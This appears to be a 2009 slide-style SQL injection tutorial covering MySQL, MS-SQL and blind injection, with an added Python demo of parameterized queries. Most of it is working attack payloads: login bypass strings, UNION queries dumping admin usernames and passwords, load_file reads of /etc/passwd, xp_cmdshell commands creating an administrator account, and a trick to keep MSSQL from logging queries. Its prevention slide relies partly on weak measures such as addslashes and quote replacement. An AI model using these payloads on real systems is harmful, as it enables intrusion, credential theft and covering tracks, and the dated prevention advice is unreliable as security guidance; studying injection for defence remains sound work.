27 March 2009 by: nazRuL [at] delaforta.net
Introduction: SQL Injection
SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and is thereby unexpectedly executed.
Simple Concept
' or 1=1--
' or '' = '
' or 1=1#
') or '1'='1--
admin'/*
etc.....
MySQL Injection
* Unvalidated input
* Appending a single quote (')
* Testing with an "AND" query
Injection...
* Find the number of tables => ORDER BY
* Find the column positions => UNION SELECT
* Find table names > information_schema > limit > group_concat
Injection (continued)
* Find column names > information_schema > 'table_name' == hex string > limit > group_concat
* Let's get the XxX..
The secret behind the information_schema table
Advanced...
* Magic queries
.:. load_file('/path/file'); e.g. /etc/passwd
.:. into dumpfile ('/path/file'); e.g. /tmp/blabla > a known path with perm 777 (/known/path/)
MS-SQL Injection
* Unvalidated input
* Appending a single quote (')
* Testing with an "AND" query
Injection...
* Finding table names => having 1=1-- (exploiting the SQL query error)
* Using a "group by" query => (group by table,table having 1=1--)
Injection... Data Manipulation
* UPDATE (update table_name set column2 where column1=n)
* INSERT (insert into table_name values(n,'value'))
* DROP (drop table table_name)
* SHUTDOWN
Advanced...
* Magic queries
.:. Check user status: convert(int,(select+user));--
.:. CMD shell query:
* exec+master..xp_cmdshell 'net user uname pass /add'
* exec+master..xp_cmdshell 'net localgroup administrator uname /add'
Prevention
- PHP based: convert everything to int, 'magic' quotes off, strip_tags, the addslashes function
- ASP based: replace ' with ", SQL error handling
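As an added example that is not part of the original slides, the unvalidated-input bug is shown beside two of the fixes the prevention slide lists (bound parameters instead of string concatenation, and converting numeric input to int), run in Python against an in-memory SQLite table; the table, its two users and the login functions are constructed here for the demonstration, and the probe input is the first payload from the "Simple Concept" slide.

```python
import sqlite3

# Constructed sample data for this demonstration (not from the slides).
SAMPLE_USERS = [(1, "admin", "s3cret"), (2, "alice", "wonderland")]


def make_db():
    """Build an in-memory SQLite users table from the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def login_vulnerable(conn, username, password):
    """Query built by string concatenation: the unvalidated-input bug the slides describe.
    A quote in the input ends the string literal and the rest becomes SQL."""
    sql = ("SELECT username FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return [row[0] for row in conn.execute(sql)]


def login_parameterized(conn, username, password):
    """Bound parameters: the input reaches the engine as data, never as SQL text."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (username, password))]


def user_by_id_cast_to_int(conn, raw_id):
    """The slides' 'convert everything to int' rule for numeric parameters:
    anything that is not a plain integer is rejected before any SQL is built."""
    try:
        user_id = int(raw_id)
    except ValueError:
        return None
    row = conn.execute("SELECT username FROM users WHERE id = ?", (user_id,)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    payload = "' or 1=1--"  # first payload on the 'Simple Concept' slide
    print("concatenated: ", login_vulnerable(db, payload, "x"))      # every user
    print("parameterized:", login_parameterized(db, payload, "x"))   # nobody
    print("int-cast id:  ", user_by_id_cast_to_int(db, "1 or 1=1"))  # None
```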
Blind SQL Injection: Definition....
Blind SQL
=> WHERE+table_name+NOT+IN+('table_that_appeared')
# Searching for table_admin, username or password #
UNION+SELECT+1,2,table_name,4+FROM+INFORMATION_SCHEMA.TABLES
=> WHERE+table_name+NOT+IN+('table_that_appeared')
UNION+SELECT+1,2,column_name,4+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name='desired_table'
=> WHERE+table_name='user'+AND+column_name+NOT+IN+('column_that_appeared')
UNION+SELECT+1,2,user,pass,4+FROM+table_admin
# Tips #
* Use concatenation "to display fields with many column_names": ID+':'+username+':'+userpass ( ID%2B':'%2Busername%2B':'%2Buserpass )
* Use --sp_password: "sp_password keeps MSSQL from logging the query in MSSQL (it is possibly only logged on the server)" > often encountered in web applications: asp, cfm, aspx, etc..